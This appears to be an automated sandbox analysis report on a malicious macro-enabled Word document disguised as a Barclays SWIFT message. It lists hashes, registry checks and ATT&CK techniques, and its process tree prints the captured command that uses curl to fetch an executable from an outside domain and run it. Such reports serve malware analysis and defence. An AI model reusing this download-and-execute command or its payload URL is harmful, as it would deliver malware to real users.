208e96b92135480cddf4e5295f0f55c0269599fa7ebcd92ceac03ad36cf7cfbb

Analysis

max time kernel
104s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
31/10/2022, 08:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BARCLAYS bank swift message.docm
Size

19KB
MD5

afa68e0b039986cb7d5c669eb0361ee7
SHA1

adae97ce6b4bcbf85589a1cf3d709f00fd46f2ee
SHA256

208e96b92135480cddf4e5295f0f55c0269599fa7ebcd92ceac03ad36cf7cfbb
SHA512

8c5f80b4cfcbd7061e341c3f9dcfac8efa648ece5b299fde8390804f61ecf696de98954184b6fb444355350c75101871cbec68dbf9df2e71f3f19bc0c0b23411
SSDEEP

384:VOnFGK9JH04s/wyPLYGMyMrCHYvXW3ivLsZrx8tAClypRuh:oAKzsYuKy9YvXW3izsZrx7kye

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4768	4996	cmd.exe	68

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4996	WINWORD.EXE
4996	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4996	WINWORD.EXE
4996	WINWORD.EXE
4996	WINWORD.EXE
4996	WINWORD.EXE
4996	WINWORD.EXE
4996	WINWORD.EXE
4996	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4996 wrote to memory of 4768	4996	WINWORD.EXE	86
PID 4996 wrote to memory of 4768	4996	WINWORD.EXE	86
PID 4768 wrote to memory of 308	4768	cmd.exe	88
PID 4768 wrote to memory of 308	4768	cmd.exe	88

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BARCLAYS bank swift message.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4996
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C curl -O -J -L https://tecno-earth.cl/nm/Yceyemmzknnfqt.exe && Yceyemmzknnfqt.exe
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\system32\curl.exe
    curl -O -J -L https://tecno-earth.cl/nm/Yceyemmzknnfqt.exe
    3⤵
    PID:308

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Yceyemmzknnfqt.exe

Filesize
34KB

MD5
c188f61f6e6497fcf7a4215dfefeb969

SHA1
3ed14b37d714f7da35d5d632e68973be31640963

SHA256
c16554d9d538a64b6ea9f956492636881077bc9c13e41e404132606ecf990b9f

SHA512
b12e40c764768d084de20b3545e701712f664bbc93c1ad72bc86e3ab1dd25cc74215482a46d59e2effdff05b352e0f6e62d92e4bdbf309f1c2ef75f7a4bb12e6

Download Submit
memory/4996-135-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-136-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-137-0x00007FFD2D9C0000-0x00007FFD2D9D0000-memory.dmp

Filesize
64KB

Download
memory/4996-138-0x00007FFD2D9C0000-0x00007FFD2D9D0000-memory.dmp

Filesize
64KB

Download
memory/4996-132-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-134-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-133-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-143-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-144-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-145-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download
memory/4996-146-0x00007FFD2FEF0000-0x00007FFD2FF00000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads